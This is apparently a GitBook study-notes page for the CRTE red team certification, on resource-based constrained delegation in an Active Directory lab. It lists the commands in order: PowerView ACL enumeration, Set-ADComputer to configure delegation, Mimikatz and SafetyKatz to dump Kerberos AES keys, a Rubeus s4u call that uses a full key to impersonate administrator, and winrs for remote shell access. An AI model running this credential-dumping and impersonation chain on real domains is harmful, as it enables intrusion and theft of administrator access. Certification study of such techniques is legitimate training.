CRTE Certified Red Team Expert
HomeCertifications
  • Certified Red Team Expert (CRTE)
  • Exam Info
    • Reviews and Notes
    • Nikhil Mittal Videos
    • Course Content
  • 1️⃣Active Directory Enumeration
    • Objectives Description
  • 2️⃣Local Privilege Escalation
    • Description
  • 3️⃣Offensive .NET and PowerShell Tradecraft
    • Description
  • 4️⃣Domain Privilege Escalation
    • Description
    • LAPS
    • RBCD -
  • Lateral Movement
    • Description
  • Domain Dominance & Persistence
    • Description
    • Silver Ticket
    • Golden Ticket
    • Skeleton Key
    • Diamond Ticket
  • Cross Domain Attacks
    • ✅Description
    • 🟢Shadow Credentials
    • 🟢AD CS
  • Cross Forest Attacks
    • Description
    • 🟢Kerberoast
    • 🟢SID Abuse
    • 🟢AbusingPAM Trust
  • Defenses
    • Description
  • Detection & Detection Bypasses
    • Description
  • Deception
    • Description
Powered by GitBook
On this page
  • PowerShell
  • Binaries

Was this helpful?

  1. Domain Privilege Escalation

RBCD -

PowerShell

Enumerate if we have Write permissions over any object

# PowerView
Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'mgmtadmin'}

Configure RBCD on us-helpdesk for student machines

# AD Module
$comps = 'student1$','student2$'
Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps

We we can dump the AES Keys of the Students

# Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

# SafetyKatz Binary
SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"

# SafetyKatz Old (For Windows 2020 Server)
SafetyKatz_old.exe -Command "sekurlsa::ekeys" "exit"

Binaries

Rubeus

Use the AES key of studentx$ with Rubeus and access us-helpdesk as ANY user we want

Rubeus.exe s4u /user:student1$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt

Winrs

Now we can connect to the session

winrs -r:us-helpdesk cmd.exe
PreviousLAPSNextDescription

Last updated 1 year ago

Was this helpful?

4️⃣